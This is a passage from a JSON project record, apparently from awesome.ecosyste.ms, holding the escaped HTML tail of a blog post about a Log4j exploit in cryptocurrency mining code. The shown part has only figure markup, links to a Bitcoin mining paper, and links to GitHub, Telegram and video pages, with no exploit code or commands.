class=\"wp-image-1652\" srcset=\"https://cryptodeeptech.ru/wp-content/uploads/2022/12/image-68.png 972w, https://cryptodeeptech.ru/wp-content/uploads/2022/12/image-68-300x60.png 300w, https://cryptodeeptech.ru/wp-content/uploads/2022/12/image-68-768x154.png 768w\" sizes=\"(max-width: 972px) 100vw, 972px\"\u003e\u003c/a\u003e\u003cfigcaption class=\"wp-element-caption\"\u003e\u003ca href=\"https://cryptodeeptech.ru/blockchain-attack-vectors/\" target=\"_blank\" rel=\"noreferrer noopener\"\u003e\u003ccode\u003ehttps://cryptodeeptech.ru/blockchain-attack-vectors/\u003c/code\u003e\u003c/a\u003e\u003c/figcaption\u003e\u003c/figure\u003e\u003c/div\u003e\n\n\n\u003chr class=\"wp-block-separator has-alpha-channel-opacity\"\u003e\n\n\n\n\u003ch2 class=\"has-text-align-center\"\u003eMajority is not Enough: Bitcoin Mining is Vulnerable\u003c/h2\u003e\n\n\n\u003cdiv class=\"wp-block-image\"\u003e\n\u003cfigure class=\"aligncenter size-full\"\u003e\u003ca href=\"https://cryptodeep.ru/doc/Majority_is_not_Enough_Bitcoin_Mining_is_Vulnerable.pdf\" target=\"_blank\" rel=\"noreferrer noopener\"\u003e\u003cimg decoding=\"async\" loading=\"lazy\" width=\"960\" height=\"655\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/image-67.png\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\" class=\"wp-image-1649\" srcset=\"https://cryptodeeptech.ru/wp-content/uploads/2022/12/image-67.png 960w, https://cryptodeeptech.ru/wp-content/uploads/2022/12/image-67-300x205.png 300w, https://cryptodeeptech.ru/wp-content/uploads/2022/12/image-67-768x524.png 768w\" sizes=\"(max-width: 960px) 100vw, 960px\"\u003e\u003c/a\u003e\u003cfigcaption class=\"wp-element-caption\"\u003e\u003ca href=\"https://cryptodeep.ru/doc/Majority_is_not_Enough_Bitcoin_Mining_is_Vulnerable.pdf\" target=\"_blank\" rel=\"noreferrer noopener\"\u003e\u003ccode\u003ehttps://cryptodeep.ru/doc/Majority_is_not_Enough_Bitcoin_Mining_is_Vulnerable.pdf\u003c/code\u003e\u003c/a\u003e\u003c/figcaption\u003e\u003c/figure\u003e\u003c/div\u003e\n\n\n\u003chr class=\"wp-block-separator has-alpha-channel-opacity\"\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/demining/Log4j-Vulnerability\" target=\"_blank\" rel=\"noreferrer noopener\"\u003eGitHub\u003c/a\u003e\u003c/strong\u003e\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://t.me/cryptodeeptech\" target=\"_blank\" rel=\"noreferrer noopener\"\u003eTelegram:\u0026nbsp;https://t.me/cryptodeeptech\u003c/a\u003e\u003c/strong\u003e\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003ca href=\"https://youtu.be/PNDBjoT83zA\" target=\"_blank\" rel=\"noreferrer noopener\"\u003e\u003cstrong\u003eVideo: https://youtu.be/PNDBjoT83zA\u003c/strong\u003e\u003c/a\u003e\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://cryptodeeptech.ru/log4j-vulnerability\" target=\"_blank\" rel=\"noreferrer noopener\"\u003eSource: https://cryptodeeptech.ru/log4j-vulnerability\u003c/a\u003e\u003c/strong\u003e\u003c/p\u003e\n\n\n\n\u003chr class=\"wp-block-separator has-alpha-channel-opacity\"\u003e\n\n\n\u003cdiv class=\"wp-block-image\"\u003e\n\u003cfigure class=\"aligncenter size-large\"\u003e\u003cimg decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"576\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/032-1-1024x576.png\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\" class=\"wp-image-1874\" srcset=\"https://cryptodeeptech.ru/wp-content/uploads/2023/01/032-1-1024x576.png 1024w, https://cryptodeeptech.ru/wp-content/uploads/2023/01/032-1-300x169.png 300w, https://cryptodeeptech.ru/wp-content/uploads/2023/01/032-1-768x432.png 768w, https://cryptodeeptech.ru/wp-content/uploads/2023/01/032-1.png 1280w\" sizes=\"(max-width: 1024px) 100vw, 1024px\"\u003e\u003c/figure\u003e\u003c/div\u003e\n\n\n\u003chr class=\"wp-block-separator has-alpha-channel-opacity\"\u003e\n\n\n\n\u003cp\u003e\u003c/p\u003e\n\t\u003c/div\u003e\u003c!-- .entry-content --\u003e\n\n\t\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdemining%2Flog4j-vulnerability","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdemining%2Flog4j-vulnerability","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdemining%2Flog4j-vulnerability/lists"}